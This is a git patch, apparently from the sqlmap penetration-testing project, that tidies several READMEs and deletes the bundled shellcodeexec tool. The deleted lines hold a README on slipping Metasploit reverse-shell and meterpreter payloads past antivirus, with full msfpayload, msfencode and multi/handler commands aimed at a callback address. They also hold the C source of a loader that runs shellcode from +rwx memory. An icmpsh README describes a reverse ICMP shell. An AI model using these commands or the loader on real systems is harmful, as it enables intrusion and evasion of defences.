From 224e6376a64084d5fcc61e829b1f43bd3bce343f Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Tue, 17 Jul 2012 00:32:32 +0100
Subject: [PATCH] cleanup to README files
---
extra/icmpsh/README.txt | 12 +-
extra/runcmd/README.txt | 6 +-
extra/shellcodeexec/README | 126 ----------------
extra/shellcodeexec/README.txt | 4 +
extra/shellcodeexec/linux/Makefile | 7 -
extra/shellcodeexec/linux/shellcodeexec.c | 138 ------------------
extra/shellcodeexec/windows/README | 25 ----
extra/shellcodeexec/windows/shellcodeexec.sln | Bin 889 -> 0 bytes
.../windows/shellcodeexec/shellcodeexec.c | 138 ------------------
.../shellcodeexec/shellcodeexec.vcproj | Bin 4048 -> 0 bytes
udf/README.txt | 4 +-
11 files changed, 12 insertions(+), 448 deletions(-)
delete mode 100644 extra/shellcodeexec/README
create mode 100644 extra/shellcodeexec/README.txt
delete mode 100644 extra/shellcodeexec/linux/Makefile
delete mode 100644 extra/shellcodeexec/linux/shellcodeexec.c
delete mode 100644 extra/shellcodeexec/windows/README
delete mode 100644 extra/shellcodeexec/windows/shellcodeexec.sln
delete mode 100644 extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
delete mode 100644 extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj
diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt
index 8103e6841..631f9ee37 100644
--- a/extra/icmpsh/README.txt
+++ b/extra/icmpsh/README.txt
@@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
 The master is straight forward to use. There are no extra libraries required for the C version. The Perl master however has the following dependencies:
- * IO::Socket
- * NetPacket::IP
- * NetPacket::ICMP
+ * IO::Socket
+ * NetPacket::IP
+ * NetPacket::ICMP
 When running the master, don't forget to disable ICMP replies by the OS. For example:
- sysctl -w net.ipv4.icmp_echo_ignore_all=1
+ sysctl -w net.ipv4.icmp_echo_ignore_all=1
 If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands send from the master.
@@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
 -t host host ip address to send ping requests to. This option is mandatory!
 -r send a single test icmp request containing the string "Test1234" and then quit.
- This is for testing the connection.
+ This is for testing the connection.
 -d milliseconds delay between requests in milliseconds
 -o milliseconds timeout of responses in milliseconds. If a response has not received in time,
- the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+ the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
 The counter is set back to 0 if a response was received.
 -b num limit of blanks (unanswered icmp requests before quitting
diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt
index 7d2e93e9c..717800aa4 100644
--- a/extra/runcmd/README.txt
+++ b/extra/runcmd/README.txt
@@ -1,7 +1,3 @@
 Files in this folder can be used to compile auxiliary program that can be used for running command prompt commands skipping standard "cmd /c" way.
-They are licensed under the terms of the GNU Lesser General Public License
-and it's compiled version is available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
+They are licensed under the terms of the GNU Lesser General Public License.
diff --git a/extra/shellcodeexec/README b/extra/shellcodeexec/README
deleted file mode 100644
index 47b59bf9c..000000000
--- a/extra/shellcodeexec/README
+++ /dev/null
@@ -1,126 +0,0 @@
-= Short description =
-
-shellcodeexec is a small script to execute in memory a sequence of opcodes.
-
-
-= Background =
-
-Most of the shellcode launchers out there, including proof of concepts
-part of many "security" books, detail how to allocate a memory page as
-readable/writable/executable on POSIX systems, copy over your shellcode
-and execute it. This works just fine. However, it is limited to POSIX,
-does not necessarily consider 64-bit architecture and Windows systems.
-
-
-= Description =
-
-This script and the relevant project files (Makefile and Visual Studio
-files) allow you to compile the tool once then run your shellcode across
-different architectures and operating systems.
-
-Moreover, it solves a common real world issue: the target system's anti
-virus software blocking a Metasploit-generated payload stager (either EXE
-of ELF). Take for instance the following command line:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
-
-This generates a Metasploit payload stager, payload.exe, that as soon as
-it lands on the AV-protected target system is recognized as malicious and
-potentially blocked (depending on the on-access scan settings) by many
-anti virus products. At the time of writing this text, 21 out 41 anti
-viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
-multiple times with msfencode, less AV softwares detect it, still a lot.
-
-I have been surfing the Net and found some interesting tutorials and
-guides about packing, compressing, obfuscating and applying IDA-foo to
-portable executables et similar in order to narrow down the number of AV
-products that can detect it as a malicious file. This is all interesting,
-but does not stop few hard-to-die anti viruses to detect your backdoor.
-
-So the question is, how cool would it be to have a final solution to avoid
-all this hassle?
This is exactly where this tool comes into play!
-
-
-= Features =
-
-shellcodeexec:
-
-* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
-
-* Can be compiled and works on 32-bit and 64-bit architectures.
-
-* As far as I know, no AV detect it as malicious.
-
-* Works in DEP/NX-enabled environments: it allocates the memory page where
- it stores the shellcode as +rwx - Readable Writable and eXecutable.
-
-* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
- shellcode (generated for instance with Metasploit's msfpayload) to
- Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
- BufferRegister variable to EAX registry where the address in memory of
- the shellcode will be stored, to avoid get_pc() binary stub to be
- prepended to the shellcode.
-
-* Spawns a new thread where the shellcode is executed in a structure
- exception handler (SEH) so that if you wrap shellcodeexec into your own
- executable, it avoids the whole process to crash in case of unexpected
- behaviours.
-
-
-= HowTo =
-
-1. Generate a Metasploit shellcode and encode it with the alphanumeric
- encoder. For example for a Linux target:
-
- $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
- Or for a Windows target:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
-
-2. Execute the Metasploit multi/handler listener on your machine. For
- example for a Linux target:
-
- $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
- Or for a Windows target:
-
- $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
-
-3. Execute the alphanumeric-encoded shellcode with this tool.
For example
- on the Linux target:
-
- $ ./shellcodeexec
-
- Or, on the Windows target:
-
- C:\WINDOWS\Temp>shellcodeexec.exe
-
-
-= License =
-
-This source code is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-
-
-= Author =
-
-Bernardo Damele A. G.
-
-
-= Homepage =
-
-https://github.com/inquisb/shellcodeexec
diff --git a/extra/shellcodeexec/README.txt b/extra/shellcodeexec/README.txt
new file mode 100644
index 000000000..ad8fe349a
--- /dev/null
+++ b/extra/shellcodeexec/README.txt
@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/inquisb/shellcodeexec.
diff --git a/extra/shellcodeexec/linux/Makefile b/extra/shellcodeexec/linux/Makefile
deleted file mode 100644
index 8ce996abd..000000000
--- a/extra/shellcodeexec/linux/Makefile
+++ /dev/null
@@ -1,7 +0,0 @@
-32:
- gcc -Wall -Os shellcodeexec.c -o shellcodeexec
- strip -sx shellcodeexec
-
-64:
- gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
- strip -sx shellcodeexec
diff --git a/extra/shellcodeexec/linux/shellcodeexec.c b/extra/shellcodeexec/linux/shellcodeexec.c
deleted file mode 100644
index efec8d794..000000000
--- a/extra/shellcodeexec/linux/shellcodeexec.c
+++ /dev/null
@@ -1,138 +0,0 @@
-/*
- shellcodeexec - Script to execute in memory a sequence of opcodes
- Copyright (C) 2011 Bernardo Damele A. G.
- web: http://bernardodamele.blogspot.com
- email: bernardo.damele@gmail.com
-
- This source code is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#include
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#else
-#include
-#include
-#include
-#endif
-
-int sys_bineval(char *argv);
-
-int main(int argc, char *argv[])
-{
- if (argc < 2) {
- printf("Run:\n\tshellcodeexec \n");
- exit(-1);
- }
-
- sys_bineval(argv[1]);
-
- exit(0);
-}
-
-int sys_bineval(char *argv)
-{
- size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- int pID;
- char *code;
-#else
- int *addr;
- size_t page_size;
- pid_t pID;
-#endif
-
- len = (size_t)strlen(argv);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- // allocate a +rwx memory page
- code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
- // copy over the shellcode
- strncpy(code, argv, len);
-
- // execute it by ASM code defined in exec_payload function
- WaitForSingleObject(CreateThread(NULL, 0,
exec_payload, code, 0, &pID), INFINITE);
-#else
- pID = fork();
- if(pID<0)
- return 1;
-
- if(pID==0)
- {
- page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
- page_size = (len+page_size) & ~(page_size); // align to page boundary
-
- // mmap an +rwx memory page
- addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
-
- if (addr == MAP_FAILED)
- return 1;
-
- // copy over the shellcode
- strncpy((char *)addr, argv, len);
-
- // execute it
- ((void (*)(void))addr)();
- }
-
- if(pID>0)
- waitpid(pID, 0, WNOHANG);
-#endif
-
- return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __exec_payload(lpParameter);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __asm
- {
- mov eax, [lpParameter]
- call eax
- }
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#endif
diff --git a/extra/shellcodeexec/windows/README b/extra/shellcodeexec/windows/README
deleted file mode 100644
index 213a6c098..000000000
--- a/extra/shellcodeexec/windows/README
+++ /dev/null
@@ -1,25 +0,0 @@
-Before compiling, an enviroment variable has to be set.
-
---------------------------------------------------------------------------
-Variable name Variable description
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR Directory where the Platform SDK is installed
-
-
-Procedure for setting environment variables on Windows:
-My Computer -> Properties -> Advanced -> Environment Variables
-User variables -> New
-
-
-Sample value:
---------------------------------------------------------------------------
-Variable name Variable value
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
-
-
-Notes:
-
-To get as small portable executable as possible compile as follows:
-* Use Visual C++ 2005
-* Strip the executable with UPX
diff --git a/extra/shellcodeexec/windows/shellcodeexec.sln b/extra/shellcodeexec/windows/shellcodeexec.sln
deleted file mode 100644
index 59d33edafbfe9365d54b2be8d36256cf20fdd013..0000000000000000000000000000000000000000
GIT binary patch
literal 0 HcmV?d00001 literal 889 zcmbV~K~IA)6vxl>Q#5#)*&qeF2?q~Qm>$$DlIXT_`L|=02GRKayX;62}~K z(PgKm@BjMx`@i=--#@@DOG_a|Ucm<@>x9F&sxu~FEO=cpQNS_dbO6Vqd`(miEoBq* zOoYH$`-JrSFj~$_DkZcL8iGkFUT9kN^pzVBk3@lMxB>PJ%LdLN0YU}p)<05Co+gXbPS9!F#?OY2EpD4TdwW6 z7sIsg$ngooD6`T_^tk7}^f2am;C1F?wJNu35HSiaWKust05LCXNnN-%cHT E0gv()LI3~&
diff --git a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
deleted file mode 100644
index efec8d794..000000000
--- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
+++ /dev/null
@@ -1,138 +0,0 @@
-/*
- shellcodeexec - Script to execute in memory a sequence of opcodes
- Copyright (C) 2011 Bernardo Damele A. G.
- web: http://bernardodamele.blogspot.com
- email: bernardo.damele@gmail.com
-
- This source code is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#include
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#else
-#include
-#include
-#include
-#endif
-
-int sys_bineval(char *argv);
-
-int main(int argc, char *argv[])
-{
- if (argc < 2) {
- printf("Run:\n\tshellcodeexec \n");
- exit(-1);
- }
-
- sys_bineval(argv[1]);
-
- exit(0);
-}
-
-int sys_bineval(char *argv)
-{
- size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- int pID;
- char *code;
-#else
- int *addr;
- size_t page_size;
- pid_t pID;
-#endif
-
- len = (size_t)strlen(argv);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- // allocate a +rwx memory page
- code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
- // copy over the shellcode
- strncpy(code, argv, len);
-
- // execute it by ASM code defined in exec_payload function
- WaitForSingleObject(CreateThread(NULL, 0,
exec_payload, code, 0, &pID), INFINITE);
-#else
- pID = fork();
- if(pID<0)
- return 1;
-
- if(pID==0)
- {
- page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
- page_size = (len+page_size) & ~(page_size); // align to page boundary
-
- // mmap an +rwx memory page
- addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
-
- if (addr == MAP_FAILED)
- return 1;
-
- // copy over the shellcode
- strncpy((char *)addr, argv, len);
-
- // execute it
- ((void (*)(void))addr)();
- }
-
- if(pID>0)
- waitpid(pID, 0, WNOHANG);
-#endif
-
- return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __exec_payload(lpParameter);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __asm
- {
- mov eax, [lpParameter]
- call eax
- }
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#endif
diff --git a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj deleted file mode 100644 index d46f062f5599790fd0fa89868cb9e83296deb3db..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4048 zcmeHKTW{h<6n^$f`yV1}A2wP!fVmkNy7C35sL&wDCi@U+HP{E3tUcq7ZI*1?|K2mU z2{;W6+rG5bN*H;@bIzRGeBYV=`)w4SZ9pWHvw_;UsH&A?8mPCF1^i2*HT1Tw zzW?F%tNsm5G7`?yETDWU_&xaP>sLzocKr~;KrNP>Iq%-7_~~Y++PJ9K<;2e<1Bwd&B}Y)My{ zASs5h+@dmfu#XFiZ1vlIH{~iz<1BTlz(8{GFi_vTo%1l0s&MlB&D)A5>FIfHrZQqF zhzJ5oQmBX@6R6A=nQ9cOoHY@|M|E>Z2Wk-pB@dO7d!E~02I|I{3a~R82Ez@oR7Rpu zlE)2$D`%<#PL`xR%4JSj{&6yPNlGq(0fv-|Q)F&oF$b}sK42MbAHGR;GIGbK?BR?Z z9>rJ$2No$;aY`flHBbFO&FdR$$_fH1Gf2V_^TRB7Ob~@cW_UWbuDz?-61H} zo!`-7T@gxULK%%nIKyJWKo8VZWKe#xNkaWu#&BD3*5H3eh0XF?IX$KeL1ZcI=5L8$ zc$~+ufp9;Ym*R-YbCH|xT!Q}+4fa+8ZI zIofBVjLh!19Lq)-&a#T&X`m|kxF%u+>4f-e$`F6b6LmZSmNf5_a>FRoB_t=Eu#c`Y zA)nzCwRYm4y42e`JU&II6~~D3bV(1xemn$tSY3!i{t%rAAXA>C$04U*s~}qe@s+6q z{GCAvB!T|~0^hEADDiA1NL0m{vdX?g^i!sJ8KTS3DMLmUAs~qg$`Db#jQKfzR}QyF zHeAf+?0^Nn4be+lI({Pm_lSOn$p0d$ zFG-l}Xtq3WFoPus?1v?9S99cCOEkQ5&IcSb&)cH2d`VGs#gc*Q$Fb>~KK`~_Gk~SZgV3b-tmAug zK~j?>k$kp=*at>`$zT*9P3Gh(??s-|ZFaqe=5(#L)@pV;npN*~G`uV6Znv#ly65Hh zB4yXWOEZdo9Jvo0y$wuBx*n((ca1V=RM6nr!D^vJ7KB>8&%oMA{T+yX@AFuF%{Ld7SY)#C>QvR7S zTbW